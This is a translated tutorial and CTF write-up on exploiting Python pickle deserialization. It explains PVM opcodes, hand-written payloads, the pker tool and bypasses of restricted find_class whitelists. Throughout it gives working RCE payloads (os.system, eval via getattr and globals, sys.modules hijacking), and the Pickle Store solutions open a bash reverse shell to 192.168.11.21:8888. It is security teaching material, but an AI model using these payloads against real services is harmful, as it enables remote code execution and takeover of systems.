A preliminary study on pickle deserialization

Category: Tag:

Preface
basic knowledge
Introduction to pickle
Serializable object
object.__reduce__() function

Detailed interpretation of the pickle process
Introduction to opcode
opcode version
pickletools

Exploit
Use ideas
Preliminary understanding: simple demo of pickle EXP
How to write opcode
Common opcode analysis
Splicing opcode
Global variable coverage
Function execution
Instantiate object
Use of pker (recommended)
Precautions

CTF combat
Before doing the question: understand pickle.Unpickler.find_class()
Code-Breaking: picklecode
watevrCTF-2019:Pickle Store
Colleges and Universities Fighting Epidemic Network Security Sharing Competition: webtmp

pker instructions
Introduction
What pker can do
Usage and examples
pker: global variable coverage
pker: function execution
pker: instantiate objects
Manual assistance

pker: CTF combat
Code-Breaking: picklecode
BalsnCTF:pyshv1
BalsnCTF:pyshv2
BalsnCTF: pyshv3
watevrCTF-2019: Pickle Store
SUCTF-2019: guess_game
Colleges and Universities Fighting Epidemic Network Security Sharing Competition: webtmp

Preface
I recently encountered a CTF question about pickle. Although it was played by many masters, I also studied it carefully and summarized the relevant knowledge of pickle deserialization in as much detail as possible. The whole article introduces the basic principles of pickle, the detailed process of PVM, opcode analysis, the actual combat of CTF questions and the use of pker tools. I hope this article can help children who are beginners of pickle deserialization knowledge. The article has a lot of content. If there is an error in the article, please correct me.

Basic knowledge
Introduction to pickle
Similar to PHP, python also has a serialization function to store data in memory for a long time. Pickle is a serialization and deserialization package under python.
Python has another more primitive serialization package marshal, and pickle is generally used during development.
Compared with json, pickle is stored in binary and is not easy to read manually; json can be cross-language, and pickle is dedicated to Python; pickle can represent almost all types of python (including custom types), json can only represent some built-in types and cannot Represents a custom type.
Pickle can actually be regarded as an independent language, and operations such as python code and overwriting variables can be executed by changing the opcode. Directly written opcode is more flexible than the code generated using pickle serialization, and some codes cannot be obtained through pickle serialization (pickle parsing ability is greater than pickle generation ability).

Serializable object
None, True and False
Integer, floating point, complex
str, byte, bytearray
Contains only a collection of archiveable objects, including tuple, list, set and dict
The function defined in the outermost layer of the module (use def to define, lambda function cannot)
Built-in functions defined in the outermost layer of the module
The class defined in the outermost layer of the module
The __dict__ attribute value or the return value of the __getstate__() function can be serialized class (see the official documentation of Pickling Class Instances for details)

object.__reduce__() function

During development, you can rewrite the object.__reduce__() function of the class so that it can be rewritten in the way it is instantiated. Specifically, Python requires object.__reduce__() to return a tuple of (callable, ([para1,para2…])[,…]). Whenever an object of this type is unpickled, the callable is Will be called to generate an object (the callable is actually a constructor).
In the opcode of pickle below, the role of R is closely related to object.__reduce__(): select the first object on the stack as a function and the second object as a parameter (the second object must be a tuple), and then call this function. In fact, R corresponds exactly to the object.__reduce__() function, and the return value of object.__reduce__() will be the role of R. When the object containing this function is pickle serialized, the resulting string contains R.

Detailed interpretation of the pickle process
Pickle analysis relies on Pickle Virtual Machine (PVM).
PVM involves three parts: 1. Parsing engine 2. Stack 3. Memory:

Parsing engine: Read opcode and parameters from the stream, and interpret them. Repeat this action until you encounter. Stop. The value left on the top of the stack will be returned as the deserialized object.

Stack: It is implemented by Python’s list and is used to temporarily store data, parameters, and objects.
memo: It is implemented by Python’s dict and provides storage for the life cycle of PVM. Talking about it: Store the deserialized data in the form of key-value in memo for later use.

In order to facilitate understanding, I made the relevant part of the BH lecture into a moving picture, and the process of PVM parsing str:

PVM parsing __reduce__() process animation:

Introduction to opcode
opcode version
Because pickle has different implementation versions, the opcodes obtained in py3 and py2 are different. But pickle is backward compatible (so it can be executed in all versions with v0). Currently, there are 6 versions of pickle.

import pickle

a={‘1’: 1, ‘2’: 2}

print(f’# Original variable: {a!r}’)
for i in range(4):
print(f’pickle version{i)’,pickle.dumps(a,protocol=i))

# Output:
pickle version 0 b'(dp0\nV1\np1\nI1\nsV2\np2\nI2\ns.’
pickle version 1 b’)q\x00(X\x01\x00\x00\x001q\x01K\x01X\x01\x00\x00\x002q\x02K\x02u.’
Pickle version 2 b’\x80\x02)q\x00(X\x01\x00\x00\x001q\x01K\x01X\x01\x00\x00\x002q\x02K\x02u.’
Pickle version 3 b’\x80\x03)q\x00(X\x01\x00\x00\x001q\x01K\x01X\x01\x00\x00\x002q\x02K\x02u.’

Example of opcode of pickle3 version:

#’abcd’
b’\x80\x03X\x04\x00\x00\x00abcdq\x00.’

# \x80: Protocol header statement \x03: Protocol version
# \x04\x00\x00\x00: data length: 4
# abcd: Data
# q: The length of the string at the top of the storage stack: one byte (ie \x00)
# \x00: The top position of the stack
# .: Data cutoff

Part of the opcode table of pickle0 version:

Opcode Mnemonic Data type loaded onto the stack Example
S STRING String S’foo’\n
V UNICODE Unicode Vfo\u006f\n
I INTEGER Integer I42\n

This form intercepts part of the content on the BH pdf, the complete form can be found directly in the original pdf.

Pickletools
Use pickletools to easily convert opcode into a form that is easy to read with the naked eye

import pickletools

data=b"\x80\x03cbuiltins\nexec\nq\x00X\x13\x00\x00\x00key1=b'1'\nkey2=b'2'q\x01\x85q\x02Rq\x03."
pickletools.dis(data)

    0: \x80 PROTO      3
    2: c    GLOBAL     'builtins exec'
   17: q    BINPUT     0
   19: X    BINUNICODE "key1=b'1'\nkey2=b'2'"
   43: q    BINPUT     1
   45: \x85 TUPLE1
   46: q    BINPUT     2
   48: R    REDUCE
   49: q    BINPUT     3
   51: .    STOP
highest protocol among opcodes = 2

Exploit
Use ideas
Arbitrary code execution or command execution.
Variable coverage, to achieve the purpose of bypassing authentication by overwriting some credentials.
Preliminary understanding: simple demo of pickle EXP

import os

class genpoc(object):
def __reduce__(self):
s = “””echo test >poc.txt””” # command to be executed
return os.system, (s,) # reduce function must return tuple or string

e = genpoc()
poc = pickle.dumps(e)

print(poc) # At this point, if pickle.loads(poc), the command will be executed

Variable coverage

key1 = b'321'
key2 = b'123'
class A(object):
    def __reduce__(self):
        return (exec,("key1=b'1'\nkey2=b'2'",))

a = A()
pickle_a = pickle.dumps(a)
print(pickle_a)
pickle.loads(pickle_a)
print(key1, key2)

How to write opcode
In CTF, many functions need to be executed at a time or multiple instructions at a time. At this time, __reduce__ can not be used to solve the problem (reduce can only execute one function at a time, and when exec is disabled, you cannot execute multiple functions at once. Instructions), and you need to manually splice or construct opcode. Hand-written opcode is the difficult part of pickle deserialization.
Here you can understand why pickle is a language. Directly written opcode is more flexible than the code generated using pickle serialization. As long as it conforms to pickle syntax, you can perform operations such as variable coverage and function execution.
According to the different versions of opcode in the previous article, it can be seen that version 0 opcode is more convenient to read, so when writing manually, version 0 opcode is generally used. In the following, all opcodes are version 0 opcodes.

Common opcode analysis
In order to fully understand the role of the stack, it is strongly recommended to learn the role of opcode while watching the animation:

Because the comments in the pickle library are not very detailed, and other information on the Internet does not specifically explain the changes on the stack and memo, each of the following opcode operations is verified by my experiment and I try to put the stack and memo on The changes are explained clearly.

In addition, TRUE can be represented by I: b’I01\n’; FALSE can also be represented by I: b’I00\n’, and other opcodes can be found in the source code of the pickle library.
From these opcodes, we can get some points to note:

When writing opcodes, imagine the data in the stack to use each opcode correctly.
When understanding, pay attention to contrast with the operation of python itself (for example, append in python list corresponds to a, extend corresponds to e; update in dictionary corresponds to u).
The c operator will try to import the library, so there is no need to introduce the system library into the vulnerable code when pickle.loads.
Pickle does not support list index, dictionary index, and point number taking object attributes as lvalues. When indexing is needed, only the corresponding functions (such as getattr, dict.get) can be obtained. But because of the existence of the s, u, and b operators, they can be used as rvalues. That is, “checking is not possible, assignment is OK”. The only operations that pickle can index and look up values are c and i. And how to check the value is also an important test point for CTF.
The s, u, and b operators can construct and assign attributes and key-value pairs that were not originally available.

Splicing opcode
Remove the. That means the end of the first pickle stream, and just concatenate the second pickle stream with the first one.

Global variable coverage
Python source code:

# secret.py
name='TEST3213qkfsmfo'
# main.py
import pickle
import secret

opcode='''c__main__
secret
(S'name'
S'1'
db.'''

print('before:',secret.name)

output=pickle.loads(opcode.encode())

print('output:',output)
print('after:',secret.name)

First, get the global variable secret through c, then create a dictionary, and use b to set the attributes of secret, the payload used:

opcode='''c__main__
secret
(S'name'
S'1'
db.'''

Function execution
There are three opcodes related to function execution: R, i, o, so we can construct from three directions:

R:

b'''cos
system
(S'whoami'
tR.'''
  1. i :
b'''(S'whoami'
ios
system
.'''
  1. o :
b'''(cos
system
S'whoami'
o.'''

Instantiate object
Instantiating an object is a special function execution, here is a simple construction using R, other methods are similar:

class Student:
    def __init__(self, name, age):
        self.name = name
        self.age = age

data=b'''c__main__
Student
(S'XiaoMing'
S"20"
tR.'''

a=pickle.loads(data)
print(a.name,a.age)

Use of pker (recommended)
pker is a parser written by @eddieivan01 to generate pickle opcode in the form of Python. You can download the source code at https://github.com/eddieivan01/pker. The principle of the parser can be found in the author’s paper: Pickle opcode is constructed through AST.
Using pker, we can write pickle opcode more conveniently. The use of pker will be described in detail below. It should be noted that it is recommended to use pker for auxiliary writing when the opcode can be written by hand, and do not rely too much on pker.
Precautions
The result of pickle serialization is related to the operating system, and the payload built using windows may not run on Linux. such as:

# linux(note posix):
b'cposix\nsystem\np0\n(Vwhoami\np1\ntp2\nRp3\n.'

# windows(note nt):
b'cnt\nsystem\np0\n(Vwhoami\np1\ntp2\nRp3\n.'

CTF combat
Before doing the question: understand pickle.Unpickler.find_class()
Since the official suggestion for pickle’s security problem is to modify find_class() and introduce a whitelist to solve it, many CTF questions are for this function, so it is important to figure out how to bypass this function.
When will find_class() be called:

From the opcode perspective, when c, i, b’\x93′ appear, it will be called, so as long as the three opcodes directly introduce the module without breaking the rules.
From the python code point of view, find_class() will only be called once when the opcode is parsed, so as long as the opcode execution process is bypassed, find_class() will not be called again, that is to say, find_class() only needs to pass once and will be generated after passing The function of will not be blocked in the blacklist, so some blacklists can be bypassed by __import__.
Let’s look at two examples first:

safe_builtins = {'range','complex','set','frozenset','slice',}

class RestrictedUnpickler(pickle.Unpickler):

    def find_class(self, module, name):
        # Only allow safe classes from builtins.
        if module == "builtins" and name in safe_builtins:
            return getattr(builtins, name)
        # Forbid everything else.
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" %(module, name))
class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module == '__main__': # Only allow __main__ modules
            return getattr(sys.modules['__main__'], name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))

The first example is an example in the official document. The use of a whitelist restricts the modules that can be called to {‘range’,’complex’,’set’,’frozenset’,’slice’,}.
The second example is the filtering method in webtmp, which only allows __main__ modules. Although it seems safe, the modules introduced into the main program can be modified by calling __main__, which causes variable coverage.

From these two examples, we have learned that for developers, using a whitelist to carefully list safe modules is a way to circumvent security problems; how to bypass the restrictions in the find_class function is the key to pickle deserialization. .
In addition, the inspection points in CTF are often combined with the basic knowledge of python (usually built-in modules, attributes, functions) to inspect the familiarity with the whitelist module, so when you do the question, you can first read the whitelist module’s documentation one look:)

Code-Breaking: picklecode
The title limits the modules that can be imported by pickle to builtins, and sets a blacklist of submodules: {‘eval’,’exec’,’execfile’,’compile’,’open’,’input’,’__import__’,’exit ‘}, so the modules we can directly use are:

In the builtins module, submodules outside the blacklist.
Imported modules: io, builtins (you need to use the functions in the builtins module first)
There is no getattr in the blacklist, so you can get the submodules of io or builtins and the submodules of submodules through getattr:), and there are dangerous functions such as eval and exec in builtins, even if they are in the blacklist, they can also be obtained through getattr. Pickle can’t directly get the first-level builtins module, but can get builtins through builtins.globals(); in this way, arbitrary code can be executed. The payload is:

b'''cbuiltins
getattr
p0
(cbuiltins
dict
S'get'
tRp1
cbuiltins
globals
)Rp2
00g1
(g2
S'builtins'
tRp3
0g0
(g3
S'eval'
tR(S'__import__("os").system("whoami")'
tR.
'''

watevrCTF-2019:Pickle Store
Because the subject is a black box, there is no black and white list restriction, just change the cookie rebound shell directly. payload:

b'''cos
system
(S"bash -c 'bash -i >& /dev/tcp/192.168.11.21/8888 0>&1'"
tR.
'''

Colleges and Universities Fighting Epidemic Network Security Sharing Competition: webtmp
In the limitation, the find_class function is rewritten, and only the pickle of the __main__ module can be generated:

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module == '__main__': # Only allow __main__ modules
            return getattr(sys.modules['__main__'], name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))

In addition, b’R’ is prohibited:

try:
    pickle_data = request.form.get('data')
    if b'R' in base64.b64decode(pickle_data): 
        return 'No... I don\'t like R-things. No Rabits, Rats, Roosters or RCEs.'

The goal is to overwrite the verification in the secret. Since the secret is introduced by the main program and exists in the secret module under __main__, it can be overwritten directly. At this time, the restriction is successfully bypassed:

b'''c__main__
secret
(S'name'
S"1"
S"category"
S"2"
db0(S"1"
S"2"
i__main__
Animal
.'''

In addition to the above questions, there are four questions, BalsnCTF: pyshv1-v3 and SUCTF-2019: guess_game. Because it is still troublesome to write manually, use the pker tool to complete in the following text.

pker instructions
Introduction
pker is a parser written by @eddieivan01 to generate pickle opcode in the form of Python. You can download the source code at https://github.com/eddieivan01/pker.
Using pker, we can write pickle opcode more conveniently (to generate pickle version 0 opcode).
Again, I suggest using pker for auxiliary writing when you can write opcode by hand, and don’t rely too much on pker.
In addition, the implementation of pker uses python’s ast (abstract syntax tree) library. The abstract syntax tree is also a very important thing. If you are interested, you can study the source code of the ast library and pker. Due to space limitations, I will not describe it here.
What pker can do
Quoted from https://xz.aliyun.com/t/7012#toc-5:

Variable assignment: save to memo, save the memo subscript and variable name
Function call
Type literal construction
List and dict member modification
Object member variable modification
Specifically, pker can be used to cover original variables, execute functions, and instantiate new objects.

Usage and examples
The special grammar for pickle in pker needs to be mastered (examples are given later)
In addition, we need to pay attention to one point: all classes, modules, packages, attributes, etc. in python are objects, so that it is easy to understand each operation.
pker mainly uses three special functions of GLOBAL, INST, OBJ and some necessary conversion methods. Other opcodes can also be used manually:

The following modules can all be sub-modules containing `.`
When calling the function, pay attention to the type of parameters passed in to be consistent with the example
The corresponding opcode will be generated, but it is not equivalent to the pker code

GLOBAL
Corresponding opcode: b’c’
Get a global object under the module (the one without import is fine, such as the os below):
GLOBAL(‘os’,’system’)
Input: module, instance (callable and module are both instances)

INST
Corresponding opcode: b’i’
Create and stack an object (can execute a function):
INST(‘os’,’system’,’ls’)
Input: module,callable,para

OBJ
Corresponding opcode: b’o’
Create and stack an object (the first parameter passed in is callable, which can execute a function):
OBJ(GLOBAL(‘os’,’system’),’ls’)
Input: callable,para

xxx(xx,…)
Corresponding opcode: b’R’
Use parameter xx to call function xxx (first put the function on the stack, then put the parameters on the stack and call)

li[0]=321
or
globals_dic[‘local_var’]=’hello’
Corresponding opcode: b’s’
Update the value of an item in a list or dictionary

xx.attr=123
Corresponding opcode: b’b’
Attribute setting of xx object

return
Corresponding opcode: b’0′
Pop (as the return value of the pickle.loads function):
return xxx # Note that only one object can be returned at a time or no object (even if separated by a comma, only one tuple will be returned at the end)

Note:

Due to the functional problems of opcode itself, pker certainly does not support list index, dictionary index, and point number taking object attributes as lvalues. When indexing is needed, only corresponding functions (such as getattr, dict.get) can be obtained. But because of the existence of the s, u, and b operators, they can be used as rvalues. That is, “checking is not possible, assignment is OK”.
When pker parses S, it wraps the string with single quotes. So the double quotes in the pker code will be parsed as single quote opcode:

test="123"
return test

Is parsed as:

b"S'123'\np0\n0g0\n."

pker: global variable coverage
Override the name and category variables in the secret module directly introduced by the executable file:

secret=GLOBAL('__main__', 'secret') 
# The execution file of python is parsed as a __main__ object, and the secret is under the subordinate of the object
secret.name='1'
secret.category='2'

Overwrite the variables introduced into the module:

game = GLOBAL('guess_game', 'game')
game.curr_ticket = '123'

Next will give some specific examples of basic operations.

pker: function execution
Call via b’R’:

s='whoami'
system = GLOBAL('os', 'system')
system(s) # `b'R'` call
return

Call via b’i’:

INST('os', 'system', 'whoami')

Call via b’c’ and b’o’:

OBJ(GLOBAL('os', 'system'), 'whoami')

Multi-parameter call function:

INST('[module]', '[callable]'[, par0,par1...])
OBJ(GLOBAL('[module]', '[callable]')[, par0,par1...])

pker: instantiate objects
Instantiating an object is a special function execution

animal = INST('__main__', 'Animal','1','2')
return animal


# or

animal = OBJ(GLOBAL('__main__', 'Animal'), '1','2')
return animal

Among them, the original python file contains:

class Animal:

    def __init__(self, name, category):
        self.name = name
        self.category = category

You can also instantiate and then assign:

animal = INST('__main__', 'Animal')
animal.name='1'
animal.category='2'
return animal

Manual assistance
Splicing opcode: remove the end of the first pickle stream to indicate the end, and just splice the two together.
When creating a common class, you can pickle.dumps first, and then splice it to the payload.
pker: CTF combat
When actually using pker, you first need to have a general idea to ensure that you can write the opcode of each step, and then use pker to implement the idea.
Code-Breaking: picklecode
For the analysis ideas, see the CTF actual combat part of the handwritten opcode above, the pker code is:

getattr=GLOBAL('builtins','getattr')
dict=GLOBAL('builtins','dict')
dict_get=getattr(dict,'get')
glo_dic=GLOBAL('builtins','globals')()
builtins=dict_get(glo_dic,'builtins')
eval=getattr(builtins,'eval')
eval('print("123")')
return

BalsnCTF:pyshv1
The find_class of the subject only allows the sys module, and the object name cannot have a. The intention is obvious, to restrict sub-modules and only allow first-level modules.
The sys module has a dictionary object modules, which contains all modules imported by all py programs at runtime, and determines the modules imported by python. If the dictionary is changed, the imported modules will change. The sys itself is also included in the modules. We can bypass the restriction by including ourselves. The specific process is:

Since sys itself is included in its own subclass, we can use this to use s assignment, one level backward, and introduce submodules of sys.modules: sys.modules[‘sys’]=sys.modules It is equivalent to sys=sys.modules. In this way, we can use the objects under the original sys.modules, namely sys.modules.xxx.
First get the get function of modules, and then similar to the previous step, use s to update the sys module in modules to the os module: sys[‘sys’]=sys.get(‘os’).
Use c to get system, and then you can execute system commands.

The entire utilization process is still very clever, the pker code is:

modules=GLOBAL('sys', 'modules')
modules['sys']=modules
modules_get=GLOBAL('sys', 'get')
os=modules_get('os')
modules['sys']=os
system=GLOBAL('sys', 'system')
system('whoami')
return

BalsnCTF:pyshv2
Similar to v1, only the structs module is allowed in the find_class of the title, and the “.” is not allowed in the object name, only the first-level module is allowed. Among them, structs is an empty module. But the __import__ function is called in find_class:

class RestrictedUnpickler(pickle.Unpickler):

    def find_class(self, module, name):
        if module not in whitelist or '.' in name:
            raise KeyError('The pickle is spoilt :(')
        module = __import__(module) # Note that __import__ is called here
        return getattr(module, name)

Pay attention to the following properties of python:

__builtins__ is a dictionary common to all modules, which records all built-in functions. The corresponding function can be hijacked by modifying the corresponding key corresponding function in __builtins__. Since the topic calls the __import__ function, we can hijack the getattr function by modifying __import__.
The __dict__ list stores and determines all the attributes of an object. If its content is changed, the attributes will also change.
The realization process of c calls the find_class function (by the way, it actually imports first and then calls find_class, but because the import statement of python is actually called __import with five parameters, it cannot be used), and in the find_class of this question It is very important to call __imoprt__ once, and then call getattr, which includes a process of checking the value.

Then we manage the utilization process:

Target: structs.__builtins__[‘eval’]→Need structs.__builtins__.get function.
Realize secondary jump: hijack __import__ as structs.__getattribute__, opcodecstructs becomes structs.__getattribute__(structs).xxx.
Combination 1, 2: structs.__getattribute__(structs) should return structs.__builtins__; xxx is set to get.
Use structs.__dict__ to assign new attribute structs.structs to structs.__builtins__ so that structs.__getattribute__(structs) returns structs.__builtins__.

pker implementation:

__dict__ = GLOBAL('structs', '__dict__') #structs attribute dict
__builtins__ = GLOBAL('structs', '__builtins__') # Built-in function dict
gtat = GLOBAL('structs', '__getattribute__') # get structs.__getattribute__
__builtins__['__import__'] = gtat # Hijack __import__ function
__dict__['structs'] = __builtins__ # 把structs.structsThe attribute is assigned to __builtins__
builtin_get = GLOBAL('structs', 'get') # structs.__getattribute__('structs').get
eval = builtin_get('eval') # structs.structs['eval'](I.e. __builtins__['eval']
eval('print(123)')
return

BalsnCTF: pyshv3
The find_class of v3 is similar to v1, and restricts the structs module. Unlike v1 and v2, the flag of v3 is read by the program and does not need to reach the RCE authority. The key code is:

class Pysh(object):
    def __init__(self):
        self.key = os.urandom(100)
        self.login()
        self.cmds = {
            'help': self.cmd_help,
            'whoami': self.cmd_whoami,
            'su': self.cmd_su,
            'flag': self.cmd_flag,
        }

    def login(self):
        with open('../flag.txt', 'rb') as f:
            flag = f.read()
        flag = bytes(a ^ b for a, b in zip(self.key, flag))
        user = input().encode('ascii')
        user = codecs.decode(user, 'base64')
        user = pickle.loads(user)
        print('Login as ' + user.name + ' - ' + user.group)
        user.privileged = False
        user.flag = flag
        self.user = user

    def run(self):
        while True:
            req = input('$ ')
            func = self.cmds.get(req, None)
            if func is None:
                print('pysh: ' + req + ': command not found')
            else:
                func()

    ...

    def cmd_flag(self):
        if not self.user.privileged:
            print('flag: Permission denied')
        else:
            print(bytes(a ^ b for a, b in zip(self.user.flag, self.key)))


if __name__ == '__main__':
    pysh = Pysh()
    pysh.run()

The program first performs pickle deserialization, self.user.privileged is set to False, and then enters the command execution loop process, and provides the cmd_flag function. If self.user.privileged is True, it will return flag.
When a class implements any method of __get__, __set__, and __delete__, the class is called a “descriptor” class, and the instantiation of this class is a descriptor. For a class with a certain attribute as a descriptor, the instantiated object will no longer pass __dict__ when looking up the attribute or setting the attribute, but will call the __get__, __set__ or __delete__ method of the attribute descriptor . It should be noted that a class must set the property as a descriptor when it is declared, making it a class property, not an object property, and then the descriptor can work.
Therefore, if we set the __set__ function of the User class, it becomes a descriptor; when it is set to the privileged attribute of the User class itself, the attribute will call the __set__ function when assigning a value without being assigned , Thereby bypassing the assignment to obtain the flag.
The pker code is:

User=GLOBAL('structs','User')
User.__set__=GLOBAL('structs','User') # Make User a descriptor class
des=User('des','des') # Descriptor
User.privileged=des # Note that the descriptor must be set as a class attribute, not an instance attribute
user=User('hachp1','hachp1') # Instantiate a User object

return user

watevrCTF-2019: Pickle Store
For the analysis ideas, see the CTF actual combat part of the handwritten opcode above, the pker code is:

system=GLOBAL('os', 'system')
system('bash -c "bash -i >& /dev/tcp/192.168.11.21/8888 0>&1"')
return

SUCTF-2019: guess_game
The title is a number guessing game. Each time the input data is deserialized as a ticket, and compared with a randomly generated ticket, the flag is given for 10 correct guesses. The find_class function restricts the guess_game module and prohibits underscores (magic methods, variables):

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Only allow safe classes
        if "guess_game" == module[0:10] and "__" not in name:
            return getattr(sys.modules[module], name)
        # Forbid everything else.
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))

To cheat directly, use pickle to change game.ticket to the guessed ticket, and then change both win_count and round_count to 9 (because there is still another round, round_count must be greater than 10 to make a win or loss judgment, and the basis for flag is that win_count is equal to 10 rounds ), pickle pseudo code:

ticket=INST('guess_game.Ticket','Ticket',(1))
game=GLOBAL('guess_game','game')
game.win_count=9
game.round_count=9
game.curr_ticket=ticket

return ticket

Colleges and Universities Fighting Epidemic Network Security Sharing Competition: webtmp
For the analysis ideas, see the CTF actual combat part of the handwritten opcode above, the pker code is:

secret=GLOBAL(‘__main__’,’secret’) # python’s execution file is parsed as a __main__ object, and the secret is under the subordinate of the object
secret.name=’1′
secret.category=’2′
animal = INST(‘__main__’,’Animal’,’1′,’2′)
return animal

 

Summarize:
In order to solve the problem of pickle deserialization, the official method has been used to rewrite the Unpickler.find_class() method, introduce a whitelist to solve it, and give a warning: you must be vigilant for objects that allow deserialization. For developers, if you really want to give users the right to deserialize, it is best to use a double whitelist to restrict the module and name and fully consider whether the modules and functions in the whitelist are dangerous.
In CTF, pickle-related topics generally investigate a deep understanding of python itself (such as magic methods and attributes, etc.), and the use process can be very clever.
Because of the feature of pickle “can only assign values, not check values”, the only operation that can be queried based on key values is the find_class function, that is, opcodes such as c and i. How to find breakthroughs based on unique magic methods and attributes is the key; In the process of utilization, functions such as getattr and get are often used.
With the help of pker, you can write pickle opcode more conveniently. This tool is a powerful tool for doing problems.

Reviews

There are no reviews yet.

Be the first to review “A preliminary study on pickle deserialization”

Your email address will not be published. Required fields are marked *